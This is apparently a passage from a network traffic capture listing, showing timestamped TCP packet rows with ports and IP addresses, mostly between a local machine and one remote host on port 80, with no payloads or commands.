Nov 9, 2024 02:47:36.232295036 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.232333899 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.232357025 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.233483076 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.233503103 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.233571053 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.233578920 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.233623028 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.234900951 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.234919071 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.235002995 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.235011101 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.235095978 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.289172888 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.302056074 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.302087069 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.302170992 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.302187920 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.302328110 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.309875011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.309889078 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.309900045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.309911013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.309957027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.310000896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.311110020 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.311225891 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:36.312500954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.312572956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.312736988 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.312793970 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.313872099 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:36.313884020 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.314733028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.314771891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.314796925 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.314822912 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.315826893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.315843105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.315856934 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.315871954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.315884113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.315887928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.315942049 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.316776991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.316831112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317018986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317029953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317043066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317054987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317065954 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317101002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317111015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317115068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317126036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317163944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317169905 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317177057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317188978 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317199945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317209005 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317213058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317224026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317241907 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317270994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317383051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317394972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317405939 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317420959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317431927 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317433119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317451000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317456007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317480087 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317503929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317583084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317593098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317625046 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317686081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317698956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317714930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317725897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317735910 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317737103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317749977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317769051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317770004 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317780018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317792892 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317792892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317805052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317806959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317835093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317859888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317889929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317902088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317914009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.317939043 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.317965031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318011045 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318023920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318036079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318044901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318087101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318089008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318099976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318111897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318128109 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318129063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318141937 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318170071 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318269014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318281889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318293095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318327904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318336964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318346024 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318348885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318361998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318372011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318392038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318417072 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318424940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318435907 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318447113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318463087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318473101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318490028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318500042 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318515062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318537951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318655014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318666935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318680048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318692923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318706036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318728924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318741083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318753004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318775892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318787098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318797112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318805933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318820000 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318825006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318837881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318839073 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318849087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318857908 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318861961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318867922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318876028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318892002 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318901062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318912029 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318917990 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318928003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318952084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318963051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318974972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318977118 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.318994999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.318995953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319010973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319025993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319027901 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319041967 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319051981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319055080 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319063902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319066048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319077969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319096088 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319103003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319128036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319145918 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319209099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319231987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319242954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319253922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319266081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319287062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319319010 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319463968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319475889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319494009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319505930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319506884 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319518089 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319529057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319539070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319564104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319736004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319803953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319814920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319848061 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319849014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319863081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319873095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319885015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319900036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319921970 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.319947004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319962025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319976091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.319989920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320003033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320020914 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320046902 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320105076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320116997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320127010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320142984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320154905 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320157051 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320168972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320173979 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320199013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320231915 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320262909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320276022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320302010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320302010 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320313931 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320317030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320333004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320338011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320358038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320362091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320384026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320401907 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320467949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320477962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320488930 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320497990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320514917 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320525885 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320528984 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320538998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320539951 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320553064 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320564032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320571899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320586920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320597887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320653915 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320678949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320696115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320707083 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320718050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320729971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320744991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320755959 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320758104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320774078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320775032 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320789099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320801973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320806980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320812941 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320826054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320837975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320841074 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320852995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.320866108 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320879936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.320907116 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.323534966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.323546886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.323558092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.323590994 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.323635101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.327857971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.327869892 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.327886105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.327924967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.327966928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328026056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328044891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328054905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328087091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328098059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328100920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328111887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328123093 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328136921 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328165054 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328620911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328634024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328644991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328675032 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328706026 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328716993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328728914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328738928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328778028 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328860044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328871012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328881025 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328893900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328908920 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328919888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328922033 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328932047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328943968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328958035 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.328960896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.328989029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.329004049 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330602884 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330615997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330626011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330636024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330656052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330657959 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330670118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330681086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330682993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330692053 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330703974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330710888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330715895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330728054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330735922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330740929 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330765963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330779076 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330787897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330800056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330816984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330828905 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330832958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330832958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330842972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330868006 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330895901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.330982924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.330993891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331005096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.331017017 CET	80	52982	77.220.212.32	192.168.2.7
